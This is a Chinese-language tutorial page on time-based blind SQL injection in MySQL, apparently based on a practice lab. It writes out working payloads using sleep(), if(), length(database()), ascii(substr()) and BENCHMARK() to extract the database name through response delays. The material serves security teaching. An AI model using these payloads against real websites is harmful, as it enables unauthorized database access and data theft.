尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

基于时间的盲注

基于时间的盲注
📅 发布时间:2026/6/19 8:15:44

基于时间的盲注

在布尔盲注里通过页面的“真”(显示 Kobe)和“假”(显示不存在)来判断。 但如果遇到这种“死猪不怕开水烫”的页面呢?

image

不管你输入什么,页面的内容没有任何变化。这时候“点头/摇头”机制失效了。 唯一的办法是:掐着秒表算时间。

我们强迫数据库: “如果你听懂了我的话(条件为真),你就睡 5 秒钟再理我。”

核心函数:让数据库“睡觉”

在 MySQL 中,有一个函数叫 ​​sleep(n)​ ,意思是暂停执行 n 秒。

我们需要结合 ​if()​ 语句来构造一个“定时炸弹”:

​if(判断条件, sleep(5), 0)

如果“判断条件”是真的,就睡 5 秒;如果是假的,就睡 0 秒(立刻返回)。

比如输入下面的payload:

kobe' and sleep(5) #
  • 点击提交后,浏览器上面的圈圈会转 5 秒钟左右,页面才会刷新出来。

  • 原理:

    • 数据库找到 kobe (真)。
    • 执行 AND sleep(5)。
    • 整个查询被暂停了 5 秒。

构造进阶 Payload (测试假) kobe' and if(1=2, sleep(5), 0) #

  • 页面应该​秒开(立刻刷新)。

  • 原理:

    • ​1=2 是假的。
    • 执行 sleep(0)(不睡)。

直接“三板斧”

一旦确认了 sleep(5)​ 能让网页卡顿,接下来的操作和布尔盲注一模一样,只是判断标准变了:

  • 布尔盲注: 看页面有没有​内容。
  • 时间盲注: 看页面有没有​卡顿。

kobe' and if((你的猜测), sleep(5), 0) #

猜数据库长度:kobe' and if(length(database())=7, sleep(5), 0) #

猜第一个字母 (结合 ascii):kobe' and if(ascii(substr(database(),1,1))=112, sleep(5), 0) #

‍

ps:

网络延迟的干扰 (False Positive):

为了避免误判,睡眠时间不要太短(建议 3-5 秒),并且在网络不好的时候多测几次。

sleep() 被禁用了怎么办?

除了 sleep()​,还有一个让数据库“累死”的函数叫 ​benchmark()​ 。

让数据库做 1000 万次 MD5 运算,以此来消耗时间,达到卡顿的效果。

​BENCHMARK(10000000, MD5(1))

‍

相关新闻

  • 食品保质期提醒:冰箱内置VoxCPM-1.5-TTS-WEB-UI即将过期警告
  • Sonic数字人风格迁移尝试:动漫风/写实风切换
  • Xshell基础与核心功能

最新新闻

  • 实测无套路出价,2026哈尔滨黄金回收口碑门店深度甄选 - 名奢变现站
  • Claude 长文梳理实战:高效提炼技术文档与论文核心要点
  • 2026邯郸黄金回收白银回收铂金回收门店实测|本地正规实体老店无套路门店推荐 - 中安检金银铂钻回收
  • GPT-4.0自述式提示工程:构建可验证的能力契约
  • HsMod终极指南:55+功能全面解析与高效炉石传说插件实战配置
  • 2026嘉峪关黄金回收白银回收铂金回收门店实测|本地正规实体老店无套路门店推荐 - 中安检金银铂钻回收

日新闻

  • 5分钟掌握Python进化算法:Geatpy高性能优化工具完全指南
  • Microchip 24AA044 EEPROM选型与应用全指南:从参数解析到实战编程
  • 华为的鸿蒙到底有多牛?为什么称作遥遥领先?

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号